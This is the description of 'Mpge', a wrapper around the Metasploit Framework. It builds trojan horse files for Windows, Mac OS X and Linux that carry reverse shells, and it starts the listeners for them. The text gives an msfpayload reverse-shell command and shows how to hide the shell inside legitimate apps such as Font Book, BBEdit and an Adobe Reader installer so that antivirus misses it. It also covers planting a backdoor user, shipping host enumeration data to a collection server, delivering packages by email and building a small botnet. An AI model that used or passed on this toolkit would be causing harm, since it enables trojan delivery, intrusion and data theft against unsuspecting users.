Mpge

The script mpge.sh is a wrapper for now consists of fourth main areas: The first area is dedicated to the creation of trojans horse files for Microsoft Windows, Mac OS X and Linux. A second area for listeners instructed to intercept the connection is opened by our trojans horse files. A third area is dedicated to networking in particular monitoring and collecting information on the IP on which we are carrying out our investigation. A fourth area is dedicated to creation of trojan horse files for Mac OS X with extension .pkg, .app and .dmg (that contains files .app) and to creation of trojan horse files for Microsoft Windows. To create the trojan horse file you can use a script and insert IP address and port before you need to go inside a script and insert the original file that you want use and after a name of trojan horse file. After i used to Backbox means VMware Fusion for Mac (on MacBook os:Snow Leopard 10.6.8) and i use it for the reverse shell and reverse shell with script evil.sh between attacker MacBook with os Snow Leopard 10.6.8 and target Mac iBook POWERPC G4 said "Snow" with os Mac OS X 10.3.5 Panther. After between attacker MacBook os:Snow Leopard 10.6.8 and targetMac OS X Mountain Lion 10.8.1. Before i decided to use Mpge directly integrated with Metasploit Framework. Important: To use mpge need to run it as root. Test Environment is Attacker: MacBook Mac OS X Snow Leopard 10.6.8 Target :Mac iBook POWERPC G4 Snow Mac OS X 10.3.5 Panther, and after Attacker: MacBook Mac OS X Snow Leopard 10.6.8 and Target: iMac Mac OS X Mountain Lion 10.8.1. Warning: It's a little bit bit complicated create packages for Mac OS X but with practice you can realize them in a short time and it is said that the connection works. The connection between two Mac OS X MacBook attacker and targets Mac iBook POWERPC G4 Snow or iMac Mac OS X Mountain Lion 10.8.1 that are located in the same network sometimes it worked and sometimes not. At this point you need to prepare on MacBook attacker a new reverse shell and create a new package with PackageMaker or Iceberg and send it to the target, start a listener on a attacker, download a file on a target click on it and see if the connection opens. Don't worry if it does not work try again with calm is just for fun is for relaxing.I was able to captured the moment in which the connection means a reverse shell between these two Mac OS X a MacBook Mac OS X Snow Leopard 10.6.8 Attacker and target Mac iBook POWERPC G4 Snow Mac OS X 10.3.5 Panther and the other target iMac Mac OS X Mountain Lion 10.8.1 is open. For more details enters into the folder Files that contains folders named Reverse Shell and Backdoor, The Pyramid, MacBook and iMac, MacBook and Mac iBook POWERPC G4 Snow, Creation trojan horse file .app and .dmg and see images. While, for example in the last test the creation of the file .pkg create package with Iceberg the connection means a reverse shell is not open. Instead, in this type of test packages previously made the connections are always open. For example see images in a folder Reverse Shell and Backdoor. If the test don't succefull is necessary to stop thinking about what went wrong and when you want to try again. Structure of the wrapper: Start ./mpge.sh Insert IP: Insert IP Address. Insert Port: Choose the port that will listen. Insert Original filename: Choose the original file to be transformed. (Microsoft Windows) Before a creation of trojan horse execute script ./move.sh in a directory Original-files this script copy original file in directories /opt/local/msf/data/templates and /opt/local/msf/lib/msf/util. Insert Trojan filename: Choose the name of trojan file. (Microsoft Windows) Mpge is an Arc: In the part below Mpge becomes an arc just work on functions, paths and assign them the appropriate variables. I'm work about Microsoft Windows, Mac OS X and Linux but is possible configurate all for others os as HP UX, Sun Solaris etc... Is very fun! First Area: Payloads and Encoding: Option 1: Create Trojan Horse file for Microsoft Windows contains a reverse shell Option 2: Create Trojan Horse file for Microsoft Windows contains vncinject reverse shell For Mac OS X and Linux insert only IP address and port and after select options 3,4 or 5 and the reverse shell is ready. Option 3: Create Trojan Horse file for Mac OS X x86 contains reverse shell Option 4: Create Trojan Horse file for Mac OS X ppc contains reverse shell Option 5: Create Trojan Horse file for Linux contains reverse shell To create these trojan files for Mac OS X and Linux insert only IP address and port and after use options 3, 4, 5. Is not necessary entering Original Trojan filename and Trojan filename because the name of file are in mpge.sh. Second Area: Starting Payloads: Option 6: Starts the console listening reverse shell for Microsoft Windows Option 7: Starts the console listening vncinject reverse shell for Microsoft Windows Option 8: Starts the console listening reverse shell for Mac OS X x86 Option 9: Starts the console listening reverse shell for Mac OS X ppc Option 10: Starts the console listening reverse shell for Linux In a directory listeners are files for example named osxrev.rc set it the IP address of attacker. For more details see folder Options in directory Files. Third Area: Option 11: IP interface Option 12: Status of IP (Locate IP active) Option 13: Send mail (You send an mail with Mail.app) Option 14: Results of IP (Collection of informations about IP sent by e-mail) Option 15: VisualRoute ( Tracking Network IP) Fourth Area: Option 16: PackageMaker (Start PackageMaker to create packages for Mac OS X) Option 17: Iceberg (Create packages with Iceberg for iMac Mac OS X Montain Lion 10.8.1) Option 18: Creation of files .dmg For more details see images in a directory Options in a folder Files. Package Creation for Mac OS X: To create the packages you can use the PackageMaker or Iceberg i prefer PackageMaker after i use Iceberg for creates packages for iMac with Mac OS X Mountain Lion 10.8.1. For more details about Options 16 Iceberg see images in a directory Create package with Iceberg. PackageMaker, Iceberg, Firefox and Mail.app are already in a file Mpge v.1.3.dmg.tgz while copy Safari.app (Applications) and Disk Utility.app (Applications/Utilities) in a directory msf3. Once extracted on Mac OS X you should enter in the directory /Developer/Applications With option 15 start PackageMaker is possible to creates packages for Mac OS X v10.4 Tiger, Mac OS X v.10.3 Panther and Mac OS X v.10.5 Leopard. (Fig.5 in first page). For instructions read: Package for Mac OS X.doc To use option 16 Iceberg select folder Files and after folder Create package with Iceberg and see images. With option 16 is possible to create files .dmg and put in files .app contains a reverse shell With option 17 is possible to create files .pkg for Mountain Lion 10.8.1. Package Creation for Microsoft Windows: After is possible to creates packages for Microsoft Windows use options 1 and 2. For this experiment i used VMware Fusion on Mac OS X Snow Leopard 10.6.8. with virtual machine Microsoft Vista. About Microsoft Windows is important to test the reverse shell inside different size of file. In this experiment i use file AdbeRdr1014_en_US.exe and AVG 2013 not identifies the reverse shell. For Microsoft Windows firewall is active with permission to pass off the SSL port 443. Downloading AVG 2013 it is also equipped with a firewall. In this case we have emulated a user click on Allow to open the connection. This is only an example. It 'clear that you have to try different Antivirus and hence experimenting with different sizes and types of files. For more details see images in a folder Microsoft Windows in a folder Files. Package for Linux: Regarding Linux, you can integrate Mpge with Rust (rust.sourceforge.net/download.html) Rust allows us to create files .rpm containing the scripts .sh. For this integration, I leave to you the fun! For more information see images in a folder Linux in a folder Files Modules: You can use modules in Autoscript or manual mode. Interesting is for example the module winenum.rb that performs a full enumeration host target. In the directory created by this module i put a script compress.sh that compresses the data into a tar.gz file. For execute module when reverse shell is open command is run ./winenum.rb. You can then send the results to a server and data collection. see folder Microsoft Windows. You can try with different modules. Test on a ISP network Attacker: MacBook Target: Mac iBook POWERPC G4 Snow Note: For all test with the three Mac OS X: MacBook Snow Leopard 10.6.8, Mac iBook POWERPC G4 Snow os:Mac OS X 10.3.5 Panther and iMac with os Mac OS X Mountain Lion 10.8.1 before i used lan connection with cables RG-45 connected to a gateway of an italian ISP and after always for all test i used my wifi connection. Only recently i'm trying Powerline Technology very fun and performance with TP-Link adapters 200 Mbps only as iMac connection while MacBook and Mac iBook POWERPC G4 Snow are connected with my wifi connection. Of course remains the bottleneck output on the Internet that depends on how much bandwidth your ISP provider. ISP Network: Attacker: MacBook Target: Mac iBook POWERPC G4 Snow Installing file .pkg on Mac iBook POWERPC G4 Snow (Target), while the MacBook is an attacker. In this experiment, as in all other experiments I've never used USB flash drives but I made ​​the exchange of files over a shared folder. The reverse shell with evil script between MacBook and Mac iBook PowerPC G4 Snow is very strange test. I do not know how I came up with this test was curiosity!!! (image 7). The connection if you use files .pkg with reverse shell at the end of installation of file .pkg continued if the user not see active processes. You can see on MacBook with the command uname -a the user on Mac iBook POWERPC G4. It 's very difficult to use this type of package. Only works once. Is difficult because is how to insert a file that works only locally (evil.sh) inside a remote connection (the reverse shell). If something is wrong must rebuild all create a new reverse shell assign right permissions and create a new package from scratch a few times also redoing the reverse shell. I managed to make it work between the two Mac OS X MacBook and iBook PowerPC Snow 4-5 times then i got tired but when it succeeds is very funny! It's similar to carpe diem and i immediately making a screenshot for example "The reverse shell with evil script between MacBook and Mac iBook PowerPC G4 Snow". Was an experiment and i try it in a intranet (The internal IP address released from DHCP server of an italian ISP) without firewalls and without ids. I've never tried in this workshop, trojan files for Microsoft Windows. As regards the Mac OS X if you try to make a direct connection from your network to another host in another network this: First I do not know if it works and I've never tried.Second definitely for the Mac OS X still there being included only the payload that creates connections that are not encrypted connection certainly is intercepted by IDS and blocked by firewalls. See images in folder: MacBook and Mac iBook POWERPC G4 Snow. Reverse Shell and Backdoor: Attacker: MacBook Target: Mac iBook POWERPC G4 Snow In this experiment is a classic reverse shell between MacBook Mac OS X Snow Leopard 10.6.8 and Mac iBook POWERPC G4 Snow Mac OS X10.3.5 Panther. See image 4 Start reverse shell.png. Through this reverse shell i create file test.sh contains a backdoor that creates a user named Tod. See image 6 Backdook on Mac iBook POWERPC G4 _Snow_.png after i execute in a reverse shell a file test.sh contains a backdoor see image 7 Execute a backdoor.png.This is a list of user on Mac iBook POWERPC G4 Snow before the execution of backdoor test.sh and this is after the execution of test.sh see image 9 User Tod create on Mac iBook POWERPC G4 _Snow_.png. The images from 10 to 15 there are a ssh connection on Mac iBook Mac iBook POWERPC G4 using a user Tod and transfer of files from target Mac iBook POWERPC G4 Snow to attacker MacBook. See images in folder: Reverse Shell and Backdoor It would be interesting to try backdoor.sh directly within the package in place of evil.sh The Pyramid: Internet and return to internal lan (The internal IP address released from DHCP server of an italian ISP): Attacker: MacBook Point of support: (Webmail provider) Target: Mac iBook POWERPC G4 Snow Note:After the download of trojan horse file on a target Mac iBook POWERPC G4 Snow the connection is between the attacker: MacBook and target: Mac iBook POWERPC G4 Snow It's similar to create a pyramid! An attacker create a packages (created with the version I have tested during the experiments in which there is no usb flash drive) which contains the reverse shell created as user root and sending the file .pkg to an webmail provider (is only a point of support for our trojan file). In this experiment.The attacker MacBook is in listening login at web portal with userid and password and send a file Test.zip to mail address of target. The target an Mac iBook POWERPC G4 Snow (always me) login on the same web portal with the same userid and password and download a file Test.zip. Of course, the attacker can send directly without access to any web portal different trojans files to different email addresses just know that before the file is not intercepted. In my case being a workshop, i wanted to make a double connection attacker and target at the same web portal with the same login credentials. After download on Mac iBook POWERPC G4 Snow or iMac the user extract the file Test.zip and click on the file Test.pkg and after for to start the installation the user on target insert a root password and execute an installation. The attacker and the target are located in the same network it is an italian ISP.The attacker receives the reverse shell as the root of the target. See images in the folders "Sending file .pkg created on MacBook by e-mail to the target Mac iBook POWERPC G4 Snow" (Internet) and folder "Reverse Shell and Backdoor" (Intranet). In this test i sending file .pkg created on MacBook by e-mail at target Mac iBook POWERPC G4 Snow compress and sending by mail in a file named Test.zip that contains a file Test.pkg that contains a reverse shell for Mac OS X ppc.The user on the target download file decrompress Test.zip and click on Test.pkg insert a password as root and when the installation of file .pkg is completed and you push close installation the reverse shell on MacBook as root the process related to the reverse shell until it is closed the process. This is a package .pkg that contains a reverse shell and in post installation run a script named evil.sh. I create this package without following the official instructions but performing various tests. The result is that the evil.sh does nothing but return the same attacker the reverse shell that inherits the permissions of the user who runs it. In this case the user on Mac iBook G4 Snow is a normal user in other tests on Internet i create the reverse shell with permission as user root. The user root on Mac iBook POWERPC G4 Snow (always me) click on file .pkg insert a password of root and returns at MacBook (the attacker) a reverse shell as user root. Imagine multiple users of the same ISP network receive access to different portals and download this Trojan horse file. If we include the persistence we have a small of botnet on ISP network (which I never tried). See image 12 Reverse shell as root on MacBook of Mac iBook POWERPC G4 Snow.png in the folder Files: The Pyramid. One objective of this research is to hide the process. For more details about this test on internet and return to my lan see images in the folder: The Pyramid Test reverse shell contains in a file .app: Attacker: MacBook Mac OS X Snow Leopard 10.6.8 Target: iMac Mac OS X Mountain Lion 10.8.1 Other test were performed between MacBook Snow Leopard 10.6.8 and iMac with Mac OS X Mountain Lion 10.8.1. We have moved to create an application .app containing the reverse shell see images in the folder MacBook and iMac. Testing was conducted means lan and wifi. Is open a reverse shell between MacBook and iMac with Mac OS X Mountain Lion. To create file .app beginning i use Automator. After i realized it was much easier to insert the reverse shell into the file. app and create a symbolic link between the application executable and reverse shell all contained inside the app file itself. To create a symbolic link to a Mac OS X application just go to the directory of the application: mv mac1 /Users/Marco/Desktop/Font Book.app cd Contents mv mac1 /Users/Marco/Desktop/Font Book.app/Contents cd MacOS mv mac1 /Users/Marco/Desktop/Font Book.app/Contents/MacOS Here is the real executable of application in Mac OS X. To create the symbolic link simply move the reverse shell mac1 or mac2 in this folder MacOS and type the command ln -sf name reverse shell name application. ln -sf mac1 Font Book.app Other mode more easy is: 1) Copy Original Application in msf3 2) Create a reverse shell and copy it in a folder where is a original file for example: cp reverse shell /Users/Marco/Desktop/msf3/Original-Files/Firefox.app/Contents/MacOs/original file (es.firefox). You can change name application in mpge.sh /Users/Marco/Desktop/msf3/msfpayload osx/x86/shell_reverse_tcp LHOST=$ip LPORT=$porta X > name of the executable chmod +x name of the executable see images in a folder Creation trojan horse file .app and .dmg Creation of trojan horse files .app and their container .dmg: Attacker: MacBook Target: iMac In this experiment i download the file named BBEdit.app. Is possible to download any application. After on attacker MacBook Mac OS X Snow Leopard 10.6.8 i accessing the structure of the application and i created a symbolic link to the reverse shell i added insert in a file BBEdit.app. The user on iMac Mac OS X Mountain Lion 10.8.1 click on file BBEdit.app and open the reverse shell to the attacker MacBook. See image 5 Reverse Shell on MacBook of iMac OS X Mountain Lion 10.8.1 with file BBEdit.png. And after this is a classic reverse shell. This is a same experiment content in a folder MacBook and iMac. See image 6 Reverse shell between MacBook and image iMac(Mac OS X Mountain Lion).png which is the list directories of iMac reverse shell open on attacker MacBook see image 7 Directories of iMac with Mountain Lion.png. For more details see images in the folder MacBook and iMac and images in folder: Creation of trojan horse file .app and .dmg (that contains files .app) Hybrid Network: Test wifi and Powerline (an italian ISP network): Attacker: MacBook Target: iMac A very special experiment. I made a new experiment and i did this test on internal lan (an italian ISP). I use software Iceberg for creating packages then will insert the details. I use MacBook with my wifi connection and iMac Mac OS X Mountain Lion 10.8.1 connected with tecnology Powerline (RG54 cable with the powerline adapter to a power supply) (powerline use the protocol LonWorks). When iMac receive a packages .pkg and the user click do the installation of package, the installation continue but at one point crashes. In this experiment i close the Installer linked to the package with force quit (Uscita Forzata) and before i see in a MacBook connected through wifi that the reverse shell continues. A kind of short-circuit!!! See images in a folder: MacBook (wifi) and iMac (Powerline) short-circuit Mpge is directly integrated with Metasploit Framework but is necessary with root install ruby1.9.x: port install ruby19 and mysql5: port install mysql5. Download file Mpge v.1.3.tgz extrack, after change the file mpge.sh and insert your path example: /Users/Marco/Desktop/msf3 change with Users/your user/Desktop/msf3

Runs smoothly